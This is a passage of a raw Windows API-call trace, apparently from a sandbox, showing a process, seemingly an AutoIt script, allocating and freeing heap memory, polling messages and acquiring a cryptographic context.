RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0261.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0261.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0261.543] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0261.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0261.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0261.543] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0261.543] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0261.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0261.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0261.544] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0261.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0261.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0261.545] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0261.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0261.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0261.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0261.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0261.545] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0261.545] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0261.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0261.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0261.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0261.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0261.546] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0261.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0261.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0261.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0261.547] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0261.547] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0261.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0261.548] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0261.548] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0261.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0261.548] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0261.548] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.548] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.548] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0261.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0261.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0261.548] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0261.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0261.548] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0261.549] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0261.549] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0261.549] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0261.549] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0261.549] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0261.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0261.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0261.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0261.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0261.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0261.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0261.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0261.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0261.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0261.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0261.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0261.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0261.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0261.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0261.552] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0261.552] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0261.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0261.552] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0261.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0261.553] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0261.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0261.553] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0261.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0261.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0261.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0261.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0261.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0261.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0261.553] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0261.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0261.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0261.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.553] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0261.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0261.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0261.553] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0261.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0261.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0261.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0261.554] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0261.554] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0261.554] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0261.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0261.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0261.554] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, 